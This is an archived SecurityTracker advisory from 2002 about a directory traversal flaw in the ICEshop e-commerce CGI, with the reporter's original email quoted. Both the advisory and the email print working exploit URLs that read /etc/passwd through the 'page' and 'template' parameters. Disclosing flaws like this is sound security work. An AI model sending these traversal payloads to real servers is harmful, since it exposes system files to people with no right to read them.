SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   ICEshop Vendors:   ICEshop BV
ICEshop E-commerce Software Directory Traversal Flaw Discloses Files on the Server to Remote Users
SecurityTracker Alert ID:  1003360
SecurityTracker URL:  http://securitytracker.com/id/1003360
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 25 2002
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  

Description:   An information disclosure vulnerability was reported in the ICEshop e-commerce system. A remote user can view files on the server.

It is reported that ICEshop fails to filter '../' strings from user-supplied URLs. A remote user can send a specially crafted URL to traverse the directory and view files located anywhere on the server that are readable by the web server.

The following types of URLs will reportedly trigger the vulnerability:

http://[targethost]/takeitnow/store/ice.cgi?a_scap=1&d_prid=&d_catg=64&d_word=&page=../../../../../../../../../../../etc/passwd

http://[targethost]/ice.cgi?a_spit=1&template=../../../../../../../etc/passwd&d_prid=538337

[Editor's note: The vendor has been unable to confirm this vulnerability. Their current release version appears to be not vulnerable.]

Impact:   A remote user can view files on the server that are readable by the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.iceshop.nl/iceshop/index.html (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  iceshop


-------- Original Message --------
   From: "Alexey Sintsov" <don_huan@xakep.ru>
Subject: iceshop
     To: <bugs@securitytracker.com>

Iceshop don't filter "../" , that allow to view files on server.To work
we need arguments, instead  trmplate file, put for example
"../../../../../../etc/passwd".

Ex.

http://www.server.nl/takeitnow/store/ice.cgi?a_scap=1&d_prid=&d_catg=64&d_word=&page=./Html/fp/cat_camera.html

http://www.server.nl/takeitnow/store/ice.cgi?a_scap=1&d_prid=&d_catg=64&d_word=&page=../../../../../../../../../../../etc/passwd

or

http://www.server2.com/ice.cgi?a_spit=1&template=pro_templ1.html&d_prid=538337

http://www.server2.com/ice.cgi?a_spit=1&template=../../../../../../../etc/passwd&d_prid=538337

Don Huan aka Alexey Sintsov



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC